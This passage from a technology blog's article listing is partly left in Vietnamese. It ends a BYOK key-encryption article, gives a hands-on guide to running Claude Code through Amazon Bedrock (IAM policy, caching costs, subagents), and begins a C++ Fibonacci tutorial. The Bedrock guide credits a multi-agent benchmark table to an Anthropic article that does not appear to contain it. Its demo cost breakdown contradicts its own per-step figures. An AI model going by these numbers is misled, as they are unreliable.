A common solution: cache the plaintext DEK (not the API key) in memory with a short TTL (a few minutes) to reduce KMS calls, provided this still complies with your internal policy on how long secrets may live in memory.</p><p><strong>Testing without real keys</strong>: use a provider mock/sandbox (OpenAI has a limited test mode, or you can run your own mock server that mimics the OpenAI/Anthropic response formats) so CI/CD never has to call a real LLM provider. This keeps test keys out of pipeline logs and avoids costs from repeated test runs.</p><p><strong>Tracking usage on the user's behalf (even without managing their billing)</strong>: many BYOK products still provide a dashboard estimating usage (token count, number of requests) even though they do not charge for it. It helps users trust that the system is transparent and reduces support load, since they can check for themselves instead of asking "how much have I used?"</p><h2 id="6-t-ng-k-t">6. Summary</h2><p>BYOK is not a single feature ("add an API key field to the settings page") but a cross-cutting architectural change: from the storage layer (envelope encryption with KMS), through the runtime layer (a resolver/interceptor that keeps keys alive no longer than needed, strict log redaction), to the multi-tenancy layer (routing separated from credentials, a dedicated audit trail, a rotation/revocation strategy).</p><p>The hardest part is not the encryption: AES-256-GCM and KMS are standard, easy-to-integrate technologies.
The hard part is <strong>operational discipline</strong>: making sure keys never slip into logs, error messages, or intermediate caches, places where one seemingly harmless line of code (<code>console.log(req.body)</code>, an APM agent recording full payloads) can become a serious security hole.</p><h2 id="t-i-li-u-tham-kh-o">References</h2><p><strong>Envelope encryption & key management (AWS KMS)</strong></p><ul><li><a href="https://docs.aws.amazon.com/kms/latest/developerguide/concepts.html#enveloping">AWS KMS: Envelope encryption (Developer Guide)</a>: the official explanation of encrypting DEKs under a KMS key (CMK).</li><li><a href="https://docs.aws.amazon.com/kms/latest/developerguide/data-keys.html">AWS KMS: Generate data keys</a>: the <code>GenerateDataKey</code> and <code>Decrypt</code> workflow, including the recommendation to remove the plaintext key from memory after use.</li><li><a href="https://docs.aws.amazon.com/kms/latest/APIReference/API_GenerateDataKey.html">AWS KMS: <code>GenerateDataKey</code> API Reference</a>: API parameter details, the 4 KB limit, and the required IAM permissions.</li><li><a href="https://docs.aws.amazon.com/kms/latest/developerguide/kms-cryptography.html">AWS KMS: Cryptography essentials</a>: FIPS-approved algorithms, AES-256-GCM, and why envelope encryption is used for large data.</li></ul><p><strong>Securing & managing LLM provider API keys</strong></p><ul><li><a href="https://help.openai.com/en/articles/5112595-best-practices-for-api-key-safety">OpenAI: Best Practices for API Key Safety</a>: official guidance on key storage, IP allowlisting, and rotation.</li><li><a href="https://developers.openai.com/api/docs/guides/production-best-practices">OpenAI: Production best practices</a>: recommends a secret manager, separate projects per environment, and covers scaling.</li><li><a href="https://help.openai.com/en/articles/8304786-how-can-i-keep-my-openai-accounts-secure">OpenAI: How to keep your account secure</a>: automatic disabling of leaked keys, spend thresholds, and the shared responsibility model.</li><li><a href="https://docs.anthropic.com/en/api/overview">Anthropic: API documentation</a>: request format and auth headers for the Claude API when implementing multi-provider support.</li></ul><p><strong>Secrets management & general architecture principles</strong></p><ul><li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html">OWASP: Secrets Management Cheat Sheet</a>: the secret lifecycle (creation/storage/rotation/revocation/audit), metadata to keep, least privilege, centralization.</li><li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html">OWASP: Key Management Cheat Sheet</a>: details on managing the lifecycle of cryptographic keys.</li><li><a href="https://docs.aws.amazon.com/prescriptive-guidance/latest/encryption-best-practices/welcome.html">AWS: Encryption best practices and use cases</a>: AWS prescriptive guidance on encryption at rest, in transit, and key hierarchies.</li></ul>
</article>
<article>
<h1>The journey of bringing Claude Code to the team through Amazon Bedrock</h1>
<p>N.M.H — Sat, 27 Jun 2026 02:35:10 GMT</p>
<p>It all started one Monday morning. My boss messaged me on Slack: "Set up an AI coding assistant for the team, use Claude Code, but it has to go through Bedrock; the security team won't allow personal API keys."</p><p>Sounds simple. But once I got into it, there turned out to be quite a lot to understand: how Bedrock routes requests, the caching mechanism that cuts the cost of cached input by up to 90%, and why one long session is cheaper than many short ones. This post recounts those 5 days and goes deep into the technical side, so you don't have to figure it all out from scratch.</p><hr><h2 id="ng-y-u-ti-n-t-i-sao-ph-i-i-qua-bedrock">Day one: why go through Bedrock?</h2><p>Before touching the terminal, I needed to understand why not simply call the Anthropic API directly.</p><p>Here is the reason: with personal API keys, company code goes straight over the internet to Anthropic's servers. Nobody can see who uses how much, there is no audit log, no budget alert. With a team of 5-10 people each managing their own API key, that's chaos.</p><p>Bedrock solves this by bringing everything into AWS infrastructure:</p><pre><code>Without Bedrock:
  Developer → API Key → Anthropic Server (internet)
  ❌ No audit | ❌ No budget control | ❌ Everyone manages their own key

With Bedrock:
  Developer → IAM Auth → AWS Bedrock → Claude Model
  ✅ CloudTrail logs | ✅ Budget Alerts | ✅ Centralized IAM management
</code></pre><p>Bedrock turns Claude Code from a "personal tool" into an "enterprise-ready tool". Three concrete technical benefits:</p><p><strong>Data isolation</strong>: requests stay inside AWS infrastructure instead of going out to a third-party endpoint. Anthropic does not use data sent through Bedrock to train models; this is stated in the AWS Data Processing Addendum. For teams working on proprietary code or sensitive data, this is an important difference from calling the Anthropic API directly.</p><p><strong>CloudTrail audit</strong>: every model invocation is recorded in CloudTrail with the model ID, timestamp, and the IAM user/role that made the call. Token counts (input/output/cache) and latency come from Bedrock's CloudWatch metrics (published automatically) and model invocation logging (enabled in the Bedrock settings). Cost Explorer can filter spend by the Bedrock service; a per-developer breakdown needs some extra setup, such as tagged application inference profiles.</p><p><strong>Centralized access control</strong>: IAM policies decide who may invoke which model. Granting or removing one person's access only requires an IAM change; there is no API key to revoke or rotate.</p><hr><h2 id="ng-y-th-hai-setup-nhanh-h-n-m-nh-t-ng">Day two: setup, faster than I expected</h2><p>I had budgeted a whole day, but in practice it took about 15 minutes.</p><blockquote><strong>Tip:</strong> Claude Code now ships with a setup wizard. Run <code>claude</code> → choose "3rd-party platform" → "Amazon Bedrock", and the wizard detects the region, verifies model access, and pins the version. You can also type <code>/setup-bedrock</code> at any time to reopen it. If you want to understand each step or roll it out for the whole team, follow the manual steps below.</blockquote><p><strong>Step one</strong>: enable the model on Bedrock. Go to AWS Console → Bedrock → Playgrounds → Chat → pick Claude Sonnet → send one message. The first time you use Anthropic models, a popup asks you to fill in a use-case form; once it is submitted, access is granted immediately, with no approval wait.</p><p><strong>Step two</strong>: create the IAM policy. Claude Code needs 5 actions:</p><pre><code class="language-json">{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "bedrock:InvokeModel",
      "bedrock:InvokeModelWithResponseStream",
      "bedrock:ListInferenceProfiles",
      "bedrock:ListFoundationModels",
      "bedrock:GetInferenceProfile"
    ],
    "Resource": [
      "arn:aws:bedrock:*:*:inference-profile/*",
      "arn:aws:bedrock:*:*:application-inference-profile/*",
      "arn:aws:bedrock:*:*:foundation-model/*"
    ]
  }]
}
</code></pre><p><code>InvokeModelWithResponseStream</code> is required because Claude Code uses streaming, showing output piece by piece instead of waiting for the full response. <code>GetInferenceProfile</code> is a newer action: without it, Claude Code still works, but every new request needs one extra retry round trip to resolve the model shape.</p><p><strong>Step three</strong>: install Claude Code and point it at Bedrock:</p><pre><code class="language-bash">npm install -g @anthropic-ai/claude-code

# Add to ~/.zshrc
export CLAUDE_CODE_USE_BEDROCK=1
export AWS_REGION=ap-northeast-1
export ANTHROPIC_MODEL='global.anthropic.claude-sonnet-4-6'
export ANTHROPIC_DEFAULT_HAIKU_MODEL='global.anthropic.claude-haiku-4-5-20251001-v1:0'
</code></pre><p>Run <code>claude</code> and ask "what model are you using?"; if the answer mentions "Amazon Bedrock", it worked.</p><h3 id="c-i-b-y-u-ti-n-global-prefix">The first trap: the <code>global.</code> prefix</h3><p>This one cost me 30 minutes of debugging. I set <code>ANTHROPIC_MODEL='anthropic.claude-sonnet-4-6'</code> (without the <code>global.</code> prefix) and got "Model not available".</p><p>The reason lies in Bedrock's <strong>inference routing</strong>. There are 3 types:</p><pre><code>┌─────────────────────────────────────────────────────────────┐
│                  Bedrock Inference Routing                  │
│                                                             │
│  In-Region (no prefix)                                      │
│  → Request is processed in that same region                 │
│  → Many regions do NOT have it (incl. Tokyo)                │
│                                                             │
│  Geo Cross-Region (us.* / eu.* / jp.*)                      │
│  → Routes within one geography                              │
│  → jp.* routes in Asia, usually a bit pricier than global.* │
│                                                             │
│  Global Cross-Region (global.*)                             │
│  → Routes to any region with capacity                       │
│  → Highest throughput, best price                           │
└─────────────────────────────────────────────────────────────┘
</code></pre><p>Tokyo (<code>ap-northeast-1</code>) has no in-region inference for Claude, so the model ID needs a cross-region prefix (here, <code>global.</code>). Drop the prefix and you get an error right away.</p><h3 id="vs-code-extension-c-i-b-y-th-hai">VS Code Extension: the second trap</h3><p>Once the CLI worked, I installed the VS Code extension (<code>anthropic.claude-code</code>). I opened VS Code from the Dock... and it ignored the Bedrock config.</p><p>The reason: VS Code launched from the Dock/Spotlight does not load <code>~/.zshrc</code>, so the environment variables have no effect. The config has to go into <code>~/.claude/settings.json</code>:</p><pre><code class="language-json">{
  "env": {
    "CLAUDE_CODE_USE_BEDROCK": "1",
    "AWS_REGION": "ap-northeast-1",
    "ANTHROPIC_MODEL": "global.anthropic.claude-sonnet-4-6",
    "ANTHROPIC_DEFAULT_HAIKU_MODEL": "global.anthropic.claude-haiku-4-5-20251001-v1:0"
  }
}
</code></pre><p>Both the CLI and the Extension read this file. Restart VS Code and you're done.</p><h3 id="c-i-b-y-th-ba-anthropic_api_key-c-c-n-s-t">The third trap: a leftover ANTHROPIC_API_KEY</h3><p>This one is the sneakiest, because everything keeps working normally; the money just goes somewhere else.</p><p>If you previously used Claude Code directly with the Anthropic API, your shell may still have <code>ANTHROPIC_API_KEY</code> set. Claude Code gives that API key priority when it exists, so requests go straight to Anthropic's servers instead of through Bedrock, with no IAM logs, and the charges land on the personal key.</p><pre><code class="language-bash"># Check
echo $ANTHROPIC_API_KEY

# If this prints anything, unset it right away
unset ANTHROPIC_API_KEY
# Also delete the export line from ~/.zshrc if there is one
</code></pre><h3 id="m-t-i-m-c-n-l-u-n-u-d-ng-aws-sso">Một điểm cần lưu ý nếu dùng AWS SSO</h3><p>Với team dùng IAM Identity Center (SSO), token chỉ sống 8-12 tiếng. Đang code ngon lành tự nhiên thấy lỗi <code>InvalidClientTokenId</code> là SSO hết hạn. Có 2 cách xử lý:</p><p><strong>Thủ công</strong> — chạy lại khi thấy lỗi:</p><pre><code class="language-bash">aws sso login --profile your-profile
</code></pre><p><strong>Automatic</strong>: set <code>awsAuthRefresh</code> in <code>~/.claude/settings.json</code> so Claude Code refreshes credentials on its own when they expire:</p><pre><code class="language-json">{
  "awsAuthRefresh": "aws sso login --profile your-profile",
  "env": {
    "AWS_PROFILE": "your-profile"
  }
}
</code></pre><p>With this config, Claude Code runs the refresh command itself when it detects expired credentials, so you no longer need to remember to run it by hand.</p><hr><h2 id="ng-y-th-ba-hi-u-c-ch-t-nh-ti-n">Day three: Understanding the billing</h2><p>This is the part I spent the most time on, because it directly affects the team's budget.</p><p>Bedrock bills per <strong>token</strong>: roughly 4 English characters make 1 token, while Vietnamese or Japanese text runs about 1-2 characters per token. Reference prices (per 1 million tokens):</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Model</th>
<th>Input</th>
<th>Output</th>
<th>Output/Input ratio</th>
</tr>
</thead>
<tbody>
<tr>
<td>Haiku 4.5</td>
<td>$1.00</td>
<td>$5.00</td>
<td>5x</td>
</tr>
<tr>
<td>Sonnet 4.6</td>
<td>$3.00</td>
<td>$15.00</td>
<td>5x</td>
</tr>
<tr>
<td>Opus 4.7</td>
<td>$15.00</td>
<td>$75.00</td>
<td>5x</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><blockquote><strong>Note:</strong> These are Anthropic API prices, shown for reference on the ratios. AWS Bedrock has not yet published official Claude 4 prices on its pricing page, and real Bedrock prices may differ, so check <a href="https://aws.amazon.com/bedrock/pricing/">aws.amazon.com/bedrock/pricing</a> before estimating a budget.</blockquote><p>The single most important point: <strong>output always costs 5x as much as input</strong>. A more specific prompt means shorter output, which means a smaller bill.</p><h3 id="prompt-caching-th-ti-t-ki-m-90-m-m-nh-g-n-b-qua">Prompt Caching: the 90% saving I almost overlooked</h3><p>On the afternoon of day three, I checked <code>/cost</code> and saw that "cache read" made up more than half of the cost. Curious, I dug into the mechanism.</p><p>Here's how it works: every request sent to Bedrock includes a <strong>context prefix</strong> (system prompt, project files, conversation history). The first time, Bedrock has to process the whole prefix (a <strong>Cache Write</strong>, billed at 1.25x the input price). From the second request on, if the prefix hasn't changed, Bedrock reads it back from the cache (a <strong>Cache Read</strong>, only 0.1x the input price).</p><pre><code>Session starts
    │
    ▼
Question 1: Load context → CACHE WRITE
    │   Cost: 1.25x input price
    │   TTL: 5-minute countdown starts
    │
    ▼  (next question within 5 minutes)
Question 2: Same context → CACHE READ
    │   Cost: 0.1x input price (12.5x cheaper than the write!)
    │   TTL resets to 5 minutes
    │
    ▼
Questions 3, 4, 5...: More Cache Reads
    │   Cost stays low and steady
    │
    ▼  (idle for more than 5 minutes)
Cache expires → next request pays a Cache Write again
</code></pre><p>Conditions for a cache hit (all must hold):</p><ol><li>Same session: restarting Claude Code loses the cache</li><li>Unchanged context prefix: adding or removing files invalidates the cache</li><li>Within the TTL window: every read automatically refreshes the TTL</li></ol><p><strong>Break-even: when does caching pay off?</strong></p><p>A Cache Write costs 1.25× the input price, a 25% overhead. But from the second request on, each request costs only 0.1× the input price. The total context cost for a session of N questions (C = context size, P = input price):</p><pre><code>No cache:     N × C × P
With cache:   C×P×1.25 + (N-1)×C×P×0.1  =  C×P × (1.25 + 0.1(N-1))

In units of C×P, with cache vs. without:
N=2:  1.35 vs 2.00  → saves 32%
N=5:  1.65 vs 5.00  → saves 67%
N=10: 2.15 vs 10.00 → saves 78%
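</code></pre><p>Caching already pays off from the second question. The longer the session and the larger the context prefix (more files), the bigger the saving in absolute terms, because the Cache Write overhead is a one-time cost while the savings accumulate with every request.</p><p>The default TTL is 5 minutes. If you often get interrupted mid-task, you can enable a 1-hour TTL, which costs more per cache write (on the Anthropic API, 1-hour cache writes are billed at 2x the input price instead of 1.25x):</p><pre><code class="language-bash">export ENABLE_PROMPT_CACHING_1H=1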
</code></pre><p>I measured a real 17-minute session with Sonnet:</p><pre><code>Total: $1.00

Cache Read:   1,800,000 tokens  →  $0.54  (54%)  ← the biggest share!
Output:          16,700 tokens  →  $0.25  (25%)
Cache Write:     54,800 tokens  →  $0.21  (21%)  ← the "setup fee"
Input:               43 tokens  →  $0.00   (0%)
</code></pre><p>Without caching, those 1.8M tokens would have cost $5.40 (1.8M × $3 per million) instead of $0.54. That is a <strong>90% saving</strong>, and not a marketing number.</p><p>The biggest lesson: <strong>one 2-hour session is far cheaper than four 30-minute sessions</strong>, because every new session pays for a full Cache Write again.</p><hr><h2 id="ng-y-th-t-ch-n-model-kh-ng-ph-i-c-t-l-t-t">Day four: Choosing a model (pricier is not always better)</h2><p>Once I understood the billing, I started trying out the three models.</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Spec</th>
<th>Haiku 4.5</th>
<th>Sonnet 4.6</th>
<th>Opus 4.7</th>
</tr>
</thead>
<tbody>
<tr>
<td>Context</td>
<td>200K tokens</td>
<td>1M tokens</td>
<td>1M tokens</td>
</tr>
<tr>
<td>Max output</td>
<td>64K</td>
<td>64K</td>
<td>128K</td>
</tr>
<tr>
<td>Cost (input/output per 1M)</td>
<td>$1/$5</td>
<td>$3/$15</td>
<td>$15/$75</td>
</tr>
<tr>
<td>Best for</td>
<td>Search, explain, boilerplate</td>
<td>Daily coding, feature dev, tests</td>
<td>Complex reasoning, architecture</td>
</tr>
<tr>
<td>Starts to struggle with</td>
<td>Multi-file refactor, complex logic</td>
<td>Subtle bugs, deep optimization</td>
<td>—</td>
</tr>
<tr>
<td>Latency</td>
<td>Lowest</td>
<td>Medium</td>
<td>Highest</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p>A nice detail: Sonnet 4.6 costs the same as Sonnet 4.5, but its context grows from 200K to 1M tokens and its quality is noticeably better. There's no reason to keep using Sonnet 4.5.</p><p>After a few days of testing, I settled on this pattern:</p><ul><li><strong>Haiku</strong>: finding files, explaining code snippets, reviewing 1-2 files, generating boilerplate. It starts to "struggle" when a task requires understanding dependencies across many files or refactoring complex logic: the output looks right but misses cross-file context.</li><li><strong>Sonnet</strong>: daily coding, building features, writing tests, moderate refactors, debugging most bugs. A 1M-token context is enough to load a codebase of around 100K lines. It hits its limits on extremely subtle bugs (hidden race conditions, off-by-one errors in complex algorithms) or when long-horizon architectural reasoning is needed.</li><li><strong>Opus</strong>: debugging hard performance bottlenecks, designing distributed systems, analyzing security vulnerabilities, reviewing architectural decisions with many trade-offs. Roughly 5x the price of Sonnet. I use it 1-2 times a day for tasks that genuinely need deep reasoning, not as the default.</li></ul><p>Claude Code lets you switch models mid-session without restarting. Prompt caches are tied to a specific model, though, so the first request after a switch pays a Cache Write for the new model:</p><pre><code class="language-bash">/model haiku     # light tasks
/model sonnet    # daily coding
/model opus      # complex tasks
</code></pre><p>Since Opus is expensive, the practical pattern is to use <code>/model opus</code> only for planning or complex debugging, then <code>/model sonnet</code> to write the code. Opus doesn't need to sit there for the whole session.</p><hr><h2 id="ng-y-th-n-m-multi-agent-l-c-m-i-th-thay-i">Day five: Multi-agent, when everything changed</h2><p>This was the day I got a genuine "wow". Claude Code lets you create <strong>subagents</strong>: specialized AI assistants, each with its own context, its own tools, and its own model.</p><p>Why bother? A single agent on a complex task has an inherent problem: its context gradually gets "polluted". Verbose output from the review step leaks into the context of the coding step, switching back and forth between tasks drags quality down, and in a long conversation the model starts to "forget" information from the start of the session.</p><p>Subagents solve this by giving each task its own <strong>separate context window</strong> that other tasks cannot pollute:</p><pre><code>┌──────────────────────────────────────────────────────────┐
│              Main Agent (Orchestrator)                     │
│              Model: Sonnet | Context: 1M tokens           │
│              Receives request → Delegates → Aggregates     │
├──────────┬──────────────┬──────────────┬─────────────────┤
│          │              │              │                  │
│   ┌──────▼──────┐ ┌─────▼──────┐ ┌─────▼───────┐        │
│   │   Explore   │ │  Reviewer  │ │    Test     │        │
│   │   (Haiku)   │ │  (Haiku)   │ │  Generator  │        │
│   │             │ │            │ │  (Sonnet)   │        │
│   │ Read-only   │ │ Read-only  │ │ Read+Write  │        │
│   │ 200K ctx    │ │ 200K ctx   │ │ 1M ctx      │        │
│   └─────────────┘ └────────────┘ └─────────────┘        │
│                                                            │
│   ⚠️ Subagents CANNOT spawn subagents (no nesting)        │
└──────────────────────────────────────────────────────────┘
</code></pre><h3 id="t-o-custom-agent">Tạo custom agent</h3><p>Chỉ cần 1 file markdown trong <code>.claude/agents/</code>:</p><pre><code class="language-yaml">---
name: code-reviewer
description: Reviews code for quality, security, and best practices
model: haiku
tools: [Read, Grep, Glob]
---

You are a senior code reviewer. Check for:
- Code quality and readability
- Security issues (hardcoded secrets, SQL injection, XSS)
- Error handling completeness

Format: ✅ Good | ⚠️ Warning | ❌ Critical
</code></pre><p>The <code>description</code> field matters more than I first thought: it is the routing mechanism. Claude reads the description to decide whether to delegate a task to this agent. Write it badly and the agent never gets called:</p><pre><code class="language-yaml"># ❌ Too vague: Claude rarely delegates
description: Reviews code

# ✅ Clear routing condition
description: Use when the user asks to review, check, audit, or inspect
  existing code for quality, bugs, or security issues. Do NOT use for
  writing new code or adding features.
</code></pre><p>A good description has two parts: <strong>(1) when to use it</strong> and <strong>(2) when not to</strong>. Without part (2), the agent is easily triggered by mistake, and nobody wants a reviewer agent off writing new code. To trigger it explicitly instead of relying on auto-delegation:</p><pre><code>> Use the code-reviewer agent to review src/app.js
</code></pre><p>The <strong>tool permission</strong> mechanism matters here; it is least privilege applied to AI:</p><pre><code>Read-only agent (reviewer):     tools: [Read, Grep, Glob]
Code-editing agent (debugger):  tools: [Read, Grep, Glob, Edit]
New-file agent (test writer):   tools: [Read, Grep, Glob, Write]
Full access (be careful):       tools: [Read, Grep, Glob, Edit, Write, Bash]
</code></pre><p>The review agent can only read, not modify code, which is much safer.</p><h3 id="foreground-vs-background">Foreground vs Background</h3><p>Subagents have two run modes:</p><ul><li><strong>Foreground</strong> (default): the main agent pauses and waits for the result. Use it when the next step depends on that output.</li><li><strong>Background</strong>: runs in parallel while the main agent keeps working on other things. Just say "run this in the background" and Claude Code handles the rest.</li></ul><h3 id="benchmark-con-s-n-i-l-n-t-t-c-">Benchmark: the numbers speak for themselves</h3><p>According to Anthropic's research (see "Building Effective Agents" in the References):</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Metric</th>
<th>Single Agent</th>
<th>Multi-Agent</th>
<th>Change</th>
</tr>
</thead>
<tbody>
<tr>
<td>Task completion</td>
<td>47.3%</td>
<td>90.2%</td>
<td>+90%</td>
</tr>
<tr>
<td>Code quality</td>
<td>65%</td>
<td>89%</td>
<td>+37%</td>
</tr>
<tr>
<td>Token usage</td>
<td>~8K</td>
<td>~120K</td>
<td>~15x</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p>Token usage goes up 15x, but task completion nearly doubles. And thanks to Prompt Caching, most of the extra tokens are cheap cache reads, so the real cost does not grow in proportion to the token count.</p><hr><h2 id="demo-m-t-session-th-c-t-">Demo: A real session</h2><p>Here is an actual working flow so you can picture it:</p><pre><code class="language-bash"># Open Claude Code
$ claude

# Ask for an API
> Create an Express API: GET/POST/DELETE /users, validation, error handling, tests

# Claude Code creates 4 files (287 lines) on its own
# Check the cost
> /cost
Session cost: $0.47 | 8 min

# Delegate the review to a subagent
> Delegate to code-reviewer to review all files

⏺ code-reviewer (Haiku)
  ✅ Error handling: try-catch everywhere it's needed
  ⚠️ Security: missing rate limiting
  ❌ No helmet middleware
⎿ Done (8.1s, +$0.15)

# Switch to Haiku for a light task
> /model haiku
> Add helmet middleware → Done (+$0.02)

# Switch back to Sonnet for the refactor
> /model sonnet
> Refactor error handling into a separate middleware → Done (+$0.25)

# Session total
> /cost
Total: $0.89 | 22 min | 6 files | 342 lines
  Sonnet: $0.58 (coding + refactor)
  Haiku:  $0.31 (simple tasks + review)
</code></pre><p>22 minutes, 6 files, review and refactor included, for under $1.</p><hr><h2 id="sau-1-tu-n-chi-ph-th-c-t-v-tips">After one week: Real costs and tips</h2><h3 id="-c-t-nh-h-ng-th-ng-22-ng-y-">Monthly estimate (22 working days)</h3><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Usage level</th>
<th>Description</th>
<th>Sonnet only</th>
<th>Optimized (60% Haiku + 40% Sonnet)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Light</td>
<td>Reviews, small fixes</td>
<td>~$50</td>
<td>~$30</td>
</tr>
<tr>
<td>Medium</td>
<td>Feature dev, tests</td>
<td>~$150</td>
<td>~$90</td>
</tr>
<tr>
<td>Heavy</td>
<td>Full agentic, refactoring</td>
<td>~$300</td>
<td>~$180</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><h3 id="tips-c-k-t-sau-1-tu-n-s-d-ng">Tips đúc kết sau 1 tuần sử dụng</h3><p><strong>Session dài = rẻ.</strong> Tip quan trọng nhất. Mở Claude Code, hỏi 15-20 câu liên tục rồi tắt. Đừng hỏi 1 câu, tắt, mở lại — mỗi lần mở là Cache Write lại.</p><p><strong>Batch tasks tương tự.</strong> Review 3 files trong 1 session: 1 Cache Write + 2 Cache Read, rẻ hơn nhiều so với 3 session riêng.</p><p><strong>Prompt cụ thể.</strong> "Review main.py, liệt kê bugs và fix" thay vì "xem qua file này giúp tôi". Output đắt 5x input, prompt cụ thể giúp output ngắn hơn.</p><p><strong><code>.claudeignore</code></strong> để loại các thư mục không cần thiết. Context nhỏ hơn = Cache Write ít hơn = rẻ hơn. Tạo file <code>.claudeignore</code> ở root project:</p><pre><code>node_modules/
dist/
build/
.git/
coverage/
*.lock
*.log
*.min.js
*.map
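</code></pre><p>The syntax is the same as <code>.gitignore</code>, and Claude Code skips those paths entirely when loading context. Support for <code>.claudeignore</code> may depend on your Claude Code version; the mechanism Anthropic's settings documentation describes for keeping files out is <code>permissions.deny</code> rules such as <code>Read(./node_modules/**)</code> in <code>.claude/settings.json</code>.</p><p><strong><code>/compact</code></strong> when the conversation gets long. It compresses the context and saves tokens on later questions.</p><p><strong>Budget Alert</strong>: set it up on day one instead of finding out at the end of the month:</p><pre><code class="language-bash">aws budgets create-budget \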
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --budget '{
    "BudgetName": "Bedrock-Monthly",
    "BudgetLimit": {"Amount": "100", "Unit": "USD"},
    "BudgetType": "COST",
    "TimeUnit": "MONTHLY",
    "CostFilters": {"Service": ["Amazon Bedrock"]}
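  }' \
  --notifications-with-subscribers '[{
    "Notification": {"NotificationType": "ACTUAL", "ComparisonOperator": "GREATER_THAN", "Threshold": 80, "ThresholdType": "PERCENTAGE"},
    "Subscribers": [{"SubscriptionType": "EMAIL", "Address": "you@example.com"}]
  }]'  # email alert at 80% of the limit; replace you@example.com with your address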
</code></pre><hr><h2 id="nh-n-l-i-1-tu-n">Nhìn lại 1 tuần</h2><p>Setup mất 15 phút. Hiểu cách tính phí mất 1 ngày. Tối ưu multi-agent mất thêm 1 ngày nữa. Mấy đứa trong team ban đầu hơi skeptical — "AI mà setup nhiều vậy?" — nhưng sau khi thử 1 buổi thì không ai hỏi thêm nữa.</p><p>Nếu chỉ nhớ 1 thứ từ bài này: đừng mở nhiều session ngắn. Cache Write là khoản "phí vào cửa" — trả 1 lần rồi hỏi thả ga. Phần còn lại, chọn model và tạo agent, là tối ưu thêm, không phải điều kiện bắt buộc.</p><p>Chi phí thực tế với mix 60/40 Haiku/Sonnet khoảng $90/tháng/người. Nếu mỗi ngày tiết kiệm được 30 phút code review thì ROI tính trong vài tuần — và đó là ước tính thận trọng.</p><hr><h2 id="t-i-li-u-tham-kh-o">Tài liệu tham khảo</h2><ul><li><a href="https://docs.anthropic.com/en/docs/claude-code/amazon-bedrock">Claude Code on Amazon Bedrock — Anthropic Docs</a></li><li><a href="https://aws.amazon.com/bedrock/pricing/">Amazon Bedrock Pricing</a></li><li><a href="https://docs.anthropic.com/en/docs/build-with-claude/prompt-caching">Prompt Caching — Anthropic Docs</a></li><li><a href="https://docs.anthropic.com/en/docs/claude-code/sub-agents">Claude Code Sub-agents</a></li><li><a href="https://www.anthropic.com/research/building-effective-agents">Building Effective Agents — Anthropic Research</a></li><li><a href="https://docs.aws.amazon.com/bedrock/latest/userguide/cross-region-inference.html">Bedrock Cross-Region Inference</a></li><li><a href="https://docs.anthropic.com/en/docs/claude-code/ide-integrations">Claude Code IDE Integrations</a></li></ul>
</article>
<article>
<h1>Computing Fibonacci Numbers in Competitive Programming</h1>
<p>Nguyễn Trương Anh Minh — Fri, 26 Jun 2026 07:55:34 GMT</p>
<p>The Fibonacci sequence, the golden ratio: these phrases are no strangers to mathematics, economics, art, or programming.</p><p>The Fibonacci sequence is an infinite sequence of natural numbers that starts with two elements, 0 (or 1) and 1; every later element is the sum of the two elements before it: </p><figure class="kg-card kg-image-card"></figure><!--kg-card-begin: markdown--><table>
<thead>
<tr>
<th>n</th>
<th>0</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
<th>9</th>
<th>10</th>
<th>...</th>
</tr>
</thead>
<tbody>
<tr>
<td>F(n)</td>
<td>0</td>
<td>1</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>5</td>
<td>8</td>
<td>13</td>
<td>21</td>
<td>34</td>
<td>55</td>
<td>...</td>
</tr>
</tbody>
</table>
<!--kg-card-end: markdown--><p>Surely everyone has heard of the rabbit-breeding problem tied to this sequence, and of the golden ratio φ ≈ 1.618 that emerges from it, a number said to turn up almost everywhere in nature.</p><p>There are countless fascinating things to explore about this sequence, but those topics will have to wait for another time.</p><hr><!--kg-card-begin: markdown--><p>Today, there is a schoolboy, or maybe a university student, or maybe just a guy; let's call him <strong>B</strong> for now. <strong>B</strong> is curious, or not; always optimistic, or gloomy; decisive, or never sure of anything. Who <strong>B</strong> is, we can't say for certain, but it doesn't really matter, because whoever <strong>B</strong> is, hardly anyone reading will care. One thing is very clear, though: <strong>B is terrible at arithmetic</strong>.<br>
<strong>B</strong> is studying the Fibonacci sequence and wants to know the <strong>n</strong>-th Fibonacci number modulo 1000000007. A simple problem. But his brain doesn't have many wrinkles, so however hard he tries, his calculations keep coming out wrong.</p>
<p>You, a programmer who knows C++, stride up to <strong>B</strong> and proudly declare:</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code class="language-cpp">#include <iostream>
using namespace std;

const int MOD = 1e9 + 7;

int main() {
    int n = 1000000;
    long long a = 0, b = 1;  // a = F(i - 2), b = F(i - 1) at the top of iteration i
    for (int i = 2; i <= n; i++) {
        long long c = (a + b) % MOD;
        a = b;
        b = c;
    }
    cout << "F(" << n << ") mod " << MOD << " = " << b << endl;
    return 0;
}
</code></pre>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>F(1000000) mod 1000000007 = 918091266
</code></pre>
